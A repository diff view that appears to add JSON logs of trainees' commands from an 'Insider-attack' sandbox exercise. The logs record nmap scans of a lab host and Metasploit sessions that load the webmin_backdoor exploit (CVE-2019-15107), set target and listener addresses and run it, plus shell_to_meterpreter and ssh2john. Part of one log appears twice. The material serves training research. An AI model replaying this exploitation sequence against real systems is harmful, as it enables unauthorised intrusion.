Loading 2022-11-00 Insider-attack/results-ok/logs/sandbox-120-useractions.json 0 → 100644 +128 −0 File added.Preview size limit exceeded, changes collapsed. Show changes 2022-11-00 Insider-attack/results-ok/logs/sandbox-121-useractions.json 0 → 100644 +21 −0 Original line number Diff line number Diff line {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:13:25.204053Z","sandbox_id":"121","cmd":"arp -a","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:13:43.505108Z","sandbox_id":"121","cmd":"arp -h","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:16:12.058068Z","sandbox_id":"121","cmd":"nmap","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:17:03.791263Z","sandbox_id":"121","cmd":"nmap 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:17:38.274642Z","sandbox_id":"121","cmd":"nmap -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:18:04.146486Z","sandbox_id":"121","cmd":"nmap -vv 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:20:58.231984Z","sandbox_id":"121","cmd":"nmap -vv -sP 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:22:13.922917Z","sandbox_id":"121","cmd":"nmap -vv -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} 
{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:23:11.620893Z","sandbox_id":"121","cmd":"nmap -vv --allports -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:42:54.545964Z","sandbox_id":"121","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:02.664855Z","sandbox_id":"121","cmd":"msfconsole -help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:06.950533Z","sandbox_id":"121","cmd":"msfconsole --help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:16.031570Z","sandbox_id":"121","cmd":"msfconsole -h","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:54.106156Z","sandbox_id":"121","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:49:19.703840Z","sandbox_id":"121","cmd":"connext 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:49:24.339129Z","sandbox_id":"121","cmd":"connect 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:50:05.007653Z","sandbox_id":"121","cmd":"connect 172.18.1.5 10000","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:51:57.889520Z","sandbox_id":"121","cmd":"use exploit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"} 
{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:52:32.193250Z","sandbox_id":"121","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:52:42.010085Z","sandbox_id":"121","cmd":"set RPORT 10000","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:52:55.919979Z","sandbox_id":"121","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"} 2022-11-00 Insider-attack/results-ok/logs/sandbox-123-useractions.json 0 → 100644 +26 −0 Original line number Diff line number Diff line {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:50:43.709381Z","sandbox_id":"123","cmd":"ping 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:16.328697Z","sandbox_id":"123","cmd":"nmap help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:20.147310Z","sandbox_id":"123","cmd":"nmap --help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:27.296503Z","sandbox_id":"123","cmd":"clear","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:28.231953Z","sandbox_id":"123","cmd":"nmap --help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:55:14.616800Z","sandbox_id":"123","cmd":"nmap 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} 
{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:57:33.497027Z","sandbox_id":"123","cmd":"nmap -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:58:20.874488Z","sandbox_id":"123","cmd":"nmap -sV 172.18.1.5 -p 22","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:58:39.444274Z","sandbox_id":"123","cmd":"nmap -sV 172.18.1.5 -p 10000","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:47.627591Z","sandbox_id":"123","cmd":"exploit/unix/webapp/webmin_backdoor","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:53.879278Z","sandbox_id":"123","cmd":"ls","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:56.315315Z","sandbox_id":"123","cmd":"ls /","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:09:24.017652Z","sandbox_id":"123","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:19.379669Z","sandbox_id":"123","cmd":"exploit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:34.620924Z","sandbox_id":"123","cmd":"RHOST","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:39.842294Z","sandbox_id":"123","cmd":"RHOSTS","pool_id":"26","cmd_type":"msf-command"} 
{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:49.211873Z","sandbox_id":"123","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:56.673791Z","sandbox_id":"123","cmd":"set RPORT 10000","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:11:02.890911Z","sandbox_id":"123","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:04.840603Z","sandbox_id":"123","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:25.936841Z","sandbox_id":"123","cmd":"path-to-exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:41.334465Z","sandbox_id":"123","cmd":"expoit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:53.767159Z","sandbox_id":"123","cmd":"exploit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:01.249877Z","sandbox_id":"123","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:07.120898Z","sandbox_id":"123","cmd":"set RPORTS 10000","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:13.691804Z","sandbox_id":"123","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"} 2022-11-00 Insider-attack/results-ok/logs/sandbox-124-useractions.json 0 → 100644 +53 −0 Original line number Diff line number Diff line 
{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:00:01.081260Z","sandbox_id":"124","cmd":"nmap -Ov 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:00:11.248131Z","sandbox_id":"124","cmd":"nmap -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:01:43.272688Z","sandbox_id":"124","cmd":"nmap -V -O -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:01:54.962573Z","sandbox_id":"124","cmd":"nmap -sV -O -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:01:58.143386Z","sandbox_id":"124","cmd":"sudo nmap -sV -O -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:03:19.901139Z","sandbox_id":"124","cmd":"sudo nmap -sV -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:04:12.554536Z","sandbox_id":"124","cmd":"sudo nmap -O 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:05:12.781849Z","sandbox_id":"124","cmd":"curl -Lk 172.18.1.5:10000","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:07:53.495812Z","sandbox_id":"124","cmd":"snet-sensor-mgmt","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} 
{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:02.093457Z","sandbox_id":"124","cmd":"nmap -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:21:05.317723Z","sandbox_id":"124","cmd":"man curl","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:22:34.431155Z","sandbox_id":"124","cmd":"man passwd","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:22:59.617131Z","sandbox_id":"124","cmd":"passwd kali","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:23:20.433921Z","sandbox_id":"124","cmd":"echo -e\"kali\nkali\nkali\" | passwd kali","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:23:27.006518Z","sandbox_id":"124","cmd":"echo -e\"kali\nkali\nkali\" | passwd kali","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:23:42.436820Z","sandbox_id":"124","cmd":"chgpasswd","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:24:27.105568Z","sandbox_id":"124","cmd":"metasploit","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:24:36.681270Z","sandbox_id":"124","cmd":"ls /bin","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} 
{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:25:08.497464Z","sandbox_id":"124","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:25:15.546639Z","sandbox_id":"124","cmd":"man msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:25:36.045329Z","sandbox_id":"124","cmd":"man msfvenom","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:27:47.639167Z","sandbox_id":"124","cmd":"msf","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:27:49.960270Z","sandbox_id":"124","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:36.345571Z","sandbox_id":"124","cmd":"search webmin","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:54.097039Z","sandbox_id":"124","cmd":"use 5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:15.188181Z","sandbox_id":"124","cmd":"show options","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:31.171737Z","sandbox_id":"124","cmd":"set RHOSTS=172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:36.843859Z","sandbox_id":"124","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} 
{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:10.680011Z","sandbox_id":"124","cmd":"check","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:12.790210Z","sandbox_id":"124","cmd":"run","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:26.164691Z","sandbox_id":"124","cmd":"info 5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:57.098112Z","sandbox_id":"124","cmd":"show options","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:31:30.780366Z","sandbox_id":"124","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:32:14.357116Z","sandbox_id":"124","cmd":"set LHOST 127.0.0.1","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:32:23.661702Z","sandbox_id":"124","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:07.545146Z","sandbox_id":"124","cmd":"ifconfig","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:17.641556Z","sandbox_id":"124","cmd":"set LHOST 192.168.131.150","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:31.133251Z","sandbox_id":"124","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:12.737289Z","sandbox_id":"124","cmd":"run","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:36:29.578848Z","sandbox_id":"124","cmd":"use 
post/multi/manage/shell_to_meterpreter","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:36:32.546857Z","sandbox_id":"124","cmd":"session -l","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:38.249728Z","sandbox_id":"124","cmd":"exit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:39.340080Z","sandbox_id":"124","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:52.022503Z","sandbox_id":"124","cmd":"search webmin","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:56.191182Z","sandbox_id":"124","cmd":"5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:59.378217Z","sandbox_id":"124","cmd":"use 5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:02.308571Z","sandbox_id":"124","cmd":"show options","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:14.278996Z","sandbox_id":"124","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:16.962308Z","sandbox_id":"124","cmd":"check","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:35.811474Z","sandbox_id":"124","cmd":"ifconfig","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:46.206315Z","sandbox_id":"124","cmd":"set LHOST 192.168.131.150","pool_id":"26","cmd_type":"msf-command"} 
{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:58.398985Z","sandbox_id":"124","cmd":"run","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:39:04.339243Z","sandbox_id":"124","cmd":"set LHOST eth1","pool_id":"26","cmd_type":"msf-command"} 2022-11-00 Insider-attack/results-ok/logs/sandbox-125-useractions.json 0 → 100644 +20 −0 Original line number Diff line number Diff line {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:14:29.279655Z","sandbox_id":"125","cmd":"nmap 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:16:28.428766Z","sandbox_id":"125","cmd":"ssh 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:17:29.531158Z","sandbox_id":"125","cmd":"nmap -p- 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:21:12.119723Z","sandbox_id":"125","cmd":"v","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:21:20.645641Z","sandbox_id":"125","cmd":"nmap -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:27:59.242225Z","sandbox_id":"125","cmd":"ls","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:06.864747Z","sandbox_id":"125","cmd":"python ssh2john.py","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} 
{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:52.036898Z","sandbox_id":"125","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:12.692132Z","sandbox_id":"125","cmd":"help","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:34.509328Z","sandbox_id":"125","cmd":"search CVE-2019-15107","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:42.757532Z","sandbox_id":"125","pool_id":"26","cmd_type":"msf-command","tags":["_jsonparsefailure"]} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:50.717307Z","sandbox_id":"125","cmd":"search CVE-2019-15107","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:55.186929Z","sandbox_id":"125","cmd":"info 0","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:04.332580Z","sandbox_id":"125","cmd":"search CVE-2019-15107","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:07.976763Z","sandbox_id":"125","cmd":"use 0","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:27.968897Z","sandbox_id":"125","cmd":"show options","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:46.009119Z","sandbox_id":"125","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:56.254909Z","sandbox_id":"125","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"} 
{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:31:33.974672Z","sandbox_id":"125","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:43:20.146042Z","sandbox_id":"125","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"}
2022-11-00 Insider-attack/results-ok/logs/sandbox-120-useractions.json 0 → 100644 +128 −0 File added.
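--- a/2022-11-00 Insider-attack/results-ok/logs/sandbox-121-useractions.json
+++ b/2022-11-00 Insider-attack/results-ok/logs/sandbox-121-useractions.json
@@ -0,0 +1,21 @@
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:13:25.204053Z","sandbox_id":"121","cmd":"arp -a","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:13:43.505108Z","sandbox_id":"121","cmd":"arp -h","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:16:12.058068Z","sandbox_id":"121","cmd":"nmap","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:17:03.791263Z","sandbox_id":"121","cmd":"nmap 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:17:38.274642Z","sandbox_id":"121","cmd":"nmap -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:18:04.146486Z","sandbox_id":"121","cmd":"nmap -vv 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:20:58.231984Z","sandbox_id":"121","cmd":"nmap -vv -sP 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:22:13.922917Z","sandbox_id":"121","cmd":"nmap -vv -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:23:11.620893Z","sandbox_id":"121","cmd":"nmap -vv --allports -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:42:54.545964Z","sandbox_id":"121","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:02.664855Z","sandbox_id":"121","cmd":"msfconsole -help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:06.950533Z","sandbox_id":"121","cmd":"msfconsole --help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:16.031570Z","sandbox_id":"121","cmd":"msfconsole -h","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:54.106156Z","sandbox_id":"121","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:49:19.703840Z","sandbox_id":"121","cmd":"connext 172.18.1.5","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:49:24.339129Z","sandbox_id":"121","cmd":"connect 172.18.1.5","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:50:05.007653Z","sandbox_id":"121","cmd":"connect 172.18.1.5 10000","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:51:57.889520Z","sandbox_id":"121","cmd":"use exploit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:52:32.193250Z","sandbox_id":"121","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:52:42.010085Z","sandbox_id":"121","cmd":"set RPORT 10000","pool_id":"26","cmd_type":"msf-command"}
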